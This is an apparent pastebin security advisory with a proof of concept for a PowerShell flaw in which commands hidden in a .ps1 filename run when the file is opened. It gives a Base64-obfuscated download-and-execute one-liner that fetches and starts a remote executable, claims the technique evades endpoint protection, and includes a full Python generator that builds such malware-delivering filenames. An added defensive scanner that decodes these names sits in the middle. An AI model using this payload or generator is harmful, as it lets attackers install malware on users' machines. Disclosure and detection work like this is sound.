lollhosh

PowerShell Unsanitized Filename Command Execution by Jp

Aug 2nd, 2019
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org

PowerShell can potentially execute arbitrary code when running specially named scripts, because it trusts unsanitized filenames.
This occurs when ".ps1" filenames contain semicolons ";" or spaces, causing the execution of a different trojan file,
or the running of unexpected commands straight from the filename itself, without the need for a second file.

The trojan file does not need to be another PowerShell script; it can be any of the following: ".com", ".exe", ".bat", ".cpl", ".js", ".vbs" and ".wsf".
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe" if that script is invoked from the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.

However, when such scripts are run from the PowerShell shell rather than from "cmd.exe", the "&" (call operator) blocks the exploit from working.

Still, if the user has set PowerShell as the default program for opening ".ps1" scripts, all it takes is a double click on the file to trigger
the exploit, and the "&" call operator will no longer save you. Also, if the user has not set PowerShell as the default program for .ps1 scripts,
running the script from cmd.exe like c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.

My PoC will download a remote executable, save it to the victim's machine and then execute it; the .ps1 file's contents are irrelevant.
Also, note that I use "%CD%" to target the current working directory where the victim initially opened the file. After it calls "iwr" (Invoke-WebRequest,
abbreviated for space), it sleeps for 2 seconds and finally executes the downloaded file.

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell, as it potentially allows unexpected code execution even when the script's contents are visually reviewed.
We may also be able to bypass some endpoint protection or IDS systems that look at the contents or header of a file but not at its filename, where our
commands can be stored.

For this to work the user must have set PowerShell as the default program for opening ".ps1" files.

First, we create a Base64-encoded filename for obfuscation that will download and execute a remote executable, named "n.exe" in this case.
c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal-looking beginning, then separate commands using the ";" semicolon, e.g.

Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1

Create the executable without a file extension to save space in the filename, then save it back with the extension using the -O parameter.
The "-e" is an abbreviation of -EncodedCommand, again to save filename space.

Host the executable on a web server, or just use python -m SimpleHTTPServer 80 or whatever.
Double click to open it in PowerShell and watch the file get downloaded, saved and executed!

My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.

Note: User interaction is required, and obviously running any random PS script is dangerous... but hey, we looked at the file content and it simply printed a string!

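A defender-side check for the technique above, added here as example code and not part of the original post or its PoC: a Python scanner that splits a .ps1 filename on ";" (the way PowerShell ends up treating the name as a command line), flags PowerShell and download tokens, and decodes any -EncodedCommand argument so an analyst can read what a double-click would have run. The token list and function names are my own; the sample filename is constructed to mirror the advisory's "Test;powershell -e <B64>;2.ps1" layout.

```python
import base64
import re
from pathlib import Path

# Words in a filename that a defender should treat as suspicious: PowerShell host names,
# the download cmdlet the advisory uses, and the EncodedCommand switch it abbreviates.
SUSPICIOUS_TOKENS = {"powershell", "pwsh", "iwr", "invoke-webrequest", "start",
                     "-e", "-enc", "-encodedcommand"}
# "-e", "-enc" or "-encodedcommand" followed by a Base64 run.
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

def decode_encoded_command(blob):
    """Decode an -EncodedCommand argument (Base64 of UTF-16LE text); None if malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_ps1_filename(name):
    """Split a .ps1 filename on ';' as PowerShell would when it runs the name as a
    command line, collect suspicious tokens and decode any embedded encoded command."""
    stem = name[:-4] if name.lower().endswith(".ps1") else name
    segments = [s.strip() for s in stem.split(";")]
    tokens = sorted({w for seg in segments for w in seg.lower().split() if w in SUSPICIOUS_TOKENS})
    match = ENCODED_RE.search(stem)
    decoded = decode_encoded_command(match.group(1)) if match else None
    return {
        "filename": name,
        "segments": segments,
        "tokens": tokens,
        "decoded_command": decoded,
        # Any ';' in a script name is already a red flag; so is a PowerShell token.
        "suspicious": len(segments) > 1 or bool(tokens),
    }

def scan_directory(path):
    """Return findings for every suspicious .ps1 name in a directory (non-recursive)."""
    results = (analyze_ps1_filename(p.name) for p in Path(path).glob("*.ps1"))
    return [r for r in results if r["suspicious"]]

# Constructed sample mirroring the advisory's "Test;powershell -e <B64>;2.ps1" layout.
SAMPLE_COMMAND = "iwr 192.168.1.10/n -O n.exe"
SAMPLE_FILENAME = ("Test;powershell -e "
                   + base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")
                   + ";2.ps1")

if __name__ == "__main__":
    for key, value in analyze_ps1_filename(SAMPLE_FILENAME).items():
        print(f"{key}: {value}")
```

Run scan_directory over a user's Downloads or Desktop folder to surface names that carry a second command; a legitimate script name should never need a semicolon.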
[Exploit / PoC]
from base64 import b64encode
import argparse, sys
# Windows PowerShell - Unsanitized Filename Command Execution Vulnerability PoC
# Create ".ps1" files with embedded commands to download, save and execute malware within a PowerShell script filename.
# Expects hostname/ip-addr of web-server housing the exploit.
# By hyp3rlinx
# Apparition Security
# ====================


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    return parser.parse_args()


def main(args):
    # Build the PowerShell one-liner that will live in the filename:
    # download the remote file into %CD%, wait 2 seconds, then start it.
    PSEmbedFilenameMalwr = ""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr " + args.ipaddress + "/" + args.remote_malware_name + " -O %CD%\\" + args.local_malware_name + " ;sleep -s 2;start " + args.local_malware_name
    # -EncodedCommand expects Base64 of the UTF-16LE encoded command text.
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')).decode('ascii')


def create_file(payload):
    # The visible script body is harmless; the commands are in the filename.
    f = open("Test;PowerShell -e " + payload + ";2.ps1", "w")
    f.write("Write-Output 'Have a nice day!'")
    f.close()


if __name__ == "__main__":
    PSCmds = main(parse_args())
    create_file(PSCmds)
    print("PowerShell - Unsanitized Filename Command Execution File created!")
    print("By hyp3rlinx")

[POC Video URL]
https://www.youtube.com/watch?v=AH33RW9g8J4